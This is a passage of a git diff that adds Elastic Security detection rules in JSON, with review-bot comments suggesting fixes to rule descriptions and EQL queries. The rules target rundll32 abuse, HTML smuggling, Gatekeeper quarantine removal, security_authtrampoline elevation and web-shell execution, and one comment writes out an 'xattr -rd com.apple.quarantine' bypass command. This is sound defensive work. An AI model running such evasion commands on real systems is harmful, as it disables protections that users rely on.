Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE 
'%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related Rules\n\n- Unusual Network Connection via RunDLL32 - 52aaab7b-b51c-441a-89ce-4387b3aea886\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1h\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"rundll32.exe\" or process.pe.original_file_name == \"RUNDLL32.EXE\") and\n process.args_count == 1\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"rundll32.exe\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f036953a-4615-4707-a1ca-dc53bf69dcd5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat 
Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "f036953a-4615-4707-a1ca-dc53bf69dcd5_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_108.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_108.json new file mode 100644 index 00000000000..28f694e2959 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_108.json 
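Review bot: The `description` in this hunk says the rule fires on RunDLL32 instances "where the command line parameters were suspicious", but the `query` keys on `process.args_count == 1`, i.e. rundll32.exe started with no arguments at all, and the `note` text describes exactly that. An analyst reading the description in the rule list will expect argument inspection the rule never performs. I'd align it: `"description": "Identifies child processes of unusual instances of RunDLL32 that were started with no command line arguments. Misuse of RunDLL32 could indicate malicious activity."`. The same wording is carried into the _108 copy of this rule added further down.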
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies child processes of unusual instances of RunDLL32 where the command line parameters were suspicious. Misuse of RunDLL32 could indicate malicious activity.", + "from": "now-60m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "interval": "30m", + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Processes of RunDLL32", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Processes of RunDLL32\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nRunDLL32 is a legitimate Windows utility used to load and execute functions within dynamic-link libraries (DLLs). However, adversaries may abuse RunDLL32 to execute malicious code, bypassing security measures and evading detection. This rule identifies potential abuse by looking for an unusual process creation with no arguments followed by the creation of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE 
'%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related Rules\n\n- Unusual Network Connection via RunDLL32 - 52aaab7b-b51c-441a-89ce-4387b3aea886\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1h\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"rundll32.exe\" or process.pe.original_file_name == \"RUNDLL32.EXE\") and\n process.args_count == 1\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"rundll32.exe\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f036953a-4615-4707-a1ca-dc53bf69dcd5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat 
Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "f036953a-4615-4707-a1ca-dc53bf69dcd5_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_106.json b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_106.json new file mode 100644 index 00000000000..f382d7b6e4c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_106.json 
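Review bot: The two stages of the `query` in this hunk are asymmetric: stage one accepts a renamed binary via `process.pe.original_file_name == "RUNDLL32.EXE"`, but stage two only matches `process.parent.name : "rundll32.exe"`, so, if I read the EQL correctly, a renamed rundll32 that spawns a child never completes the sequence and the original_file_name clause is effectively dead. Because the stages are already joined on `process.entity_id` / `process.parent.entity_id`, the parent-name filter adds nothing for the legitimate name and only excludes the renamed case; it could be dropped, e.g. `[process where host.os.type == "windows" and event.type == "start"] by process.parent.entity_id`. Removing it widens the candidate set for the sequence engine, so the cost on a busy index is worth checking. This version differs from _107 only in narrowing the endpoint index pattern to `logs-endpoint.events.process-*`.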
@@ -0,0 +1,140 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a browser process to open an HTML file with high entropy and size. Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious HTML File Creation", + "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": 
"file.Ext.entropy", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.006", + "name": "HTML Smuggling", + "reference": "https://attack.mitre.org/techniques/T1027/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_107.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_107.json new file mode 100644 index 00000000000..bf782a9c5ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_107.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a potential Gatekeeper bypass. In macOS, when applications or programs are downloaded from the internet, there is a quarantine flag set on the file. This attribute is read by Apple's Gatekeeper defense program at execution time. An adversary may disable this attribute to evade defenses.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Remove File Quarantine Attribute", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", + "references": [ + "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "https://ss64.com/osx/xattr.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_106.json b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_106.json new file mode 100644 index 00000000000..e03bac68f9e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_106.json 
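Review bot: The `-d`/`-w` check in this hunk's `query` is an exact match on a single argument (`process.args : ("-d", "-w")`), so the widely used combined-flag form `xattr -rd com.apple.quarantine App.app` (or `-dr`) does not match, whereas the `-c` branch catches the clear-all form regardless of other flags. Recursive removal is the natural way to strip quarantine from an app bundle, so this is plausibly the most common variant a "fix Gatekeeper" one-liner or an adversary would use. I'd extend the list: `(process.args : "com.apple.quarantine" and process.args : ("-d", "-w", "-rd", "-dr", "-rw", "-wr"))`. Whether xattr on current macOS accepts every one of those combinations should be verified before committing to the exact set.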
@@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of the security_authtrampoline process via a scripting interpreter. This occurs when programs use AuthorizationExecute-WithPrivileges from the Security.framework to run another program with root privileges. It should not be run by itself, as this is a sign of execution with explicit logon credentials.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Execution with Explicit Credentials via Scripting", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:\"security_authtrampoline\" and\n process.parent.name:(osascript or com.apple.automator.runner or sh or bash or dash or zsh or python* or Python or perl* or php* or ruby or pwsh)\n", + "references": [ + "https://objectivebythesea.com/v2/talks/OBTS_v2_Thomas.pdf", + "https://www.manpagez.com/man/8/security_authtrampoline/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f0eb70e9-71e9-40cd-813f-bf8e8c812cb1", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.004", + "name": "Elevated Execution with Prompt", + "reference": "https://attack.mitre.org/techniques/T1548/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_106", + "type": "security-rule" +} \ No newline at end of file 
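Review bot: The `description` in this hunk names the API as `AuthorizationExecute-WithPrivileges`; the Security.framework function is `AuthorizationExecuteWithPrivileges` (the hyphen looks like a line-wrap artifact), and the sentence "It should not be run by itself" leaves "it" ambiguous. I'd rewrite it as `"description": "Identifies execution of the security_authtrampoline process via a scripting interpreter. This occurs when programs use AuthorizationExecuteWithPrivileges from the Security.framework to run another program with root privileges. security_authtrampoline is not normally launched directly by a script, so this is a sign of elevation with explicit credentials."`. The rule also carries no `false_positives` or `note`; admin and installer scripts run through Automator (`com.apple.automator.runner` is in the parent list) are a plausible benign source, so a `false_positives` entry would help triage.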
diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_7.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_7.json new file mode 100644 index 00000000000..97e224e2743 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_7.json 
@@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. Attackers may exploit a vulnerability in a web application to execute commands via a web server, or place a backdoor file that can be abused to gain code execution as a mechanism for persistence.", + "false_positives": [ + "Network monitoring or management products may have a web server component that runs shell commands as part of normal behavior." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Code Execution via Web Server", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
